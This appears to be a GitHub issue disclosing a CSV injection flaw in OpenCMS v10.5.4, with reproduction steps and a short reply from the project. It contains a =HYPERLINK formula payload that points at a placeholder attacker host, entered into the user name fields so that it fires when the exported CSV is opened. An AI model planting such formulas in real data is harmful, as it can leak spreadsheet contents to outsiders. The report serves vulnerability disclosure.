I would like to report a vulnerability (CSV Injection) which I have observed in current version v10.5.4 and before.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
Hijacking the user's computer by exploiting vulnerabilities in the spreadsheet software, such as CVE-2014-3524
Hijacking the user's computer by exploiting the user's tendency to ignore security warnings in spreadsheets that they downloaded from their own website
Exfiltrating contents from the spreadsheet, or other open spreadsheets.
Impacted URL is http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
Steps to reproduce:
Browse to Quick Launch -> Account Management -> User Management -> New User
Insert =HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe") in First Name and Last Name field
Now export all user information in CSV by using export feature in application.
Quick Launch -> Account Management -> User Management -> Export User
Once user opens the affected CSV file, payload will be triggered
I have to correct my last comment: The format has changed, but Excel still behaves the same. Nevertheless, we export CSV - not Excel files, and CSV is valid.
Hello Team,
I would like to report a vulnerability (CSV Injection) which I have observed in current version v10.5.4 and before.
When a spreadsheet program such as Microsoft Excel or LibreOffice Calc is used to open a CSV, any cells starting with '=' will be interpreted by the software as a formula. Maliciously crafted formulas can be used for three key attacks:
Please refer https://www.owasp.org/index.php/CSV_Injection for more details.
Impacted URL is http://[your_webserver_ip]/opencms/system/workplace/admin/accounts/user_new.jsp
Steps to reproduce:
Insert
=HYPERLINK("http://[attacker_ip:port]/GiveMeSomeData","IAmSafe")in First Name and Last Name fieldQuick Launch -> Account Management -> User Management -> Export User
Version Details:
Best Regards
https://github.com/varchashva
varchashva [at] gmail [dot] com
The text was updated successfully, but these errors were encountered: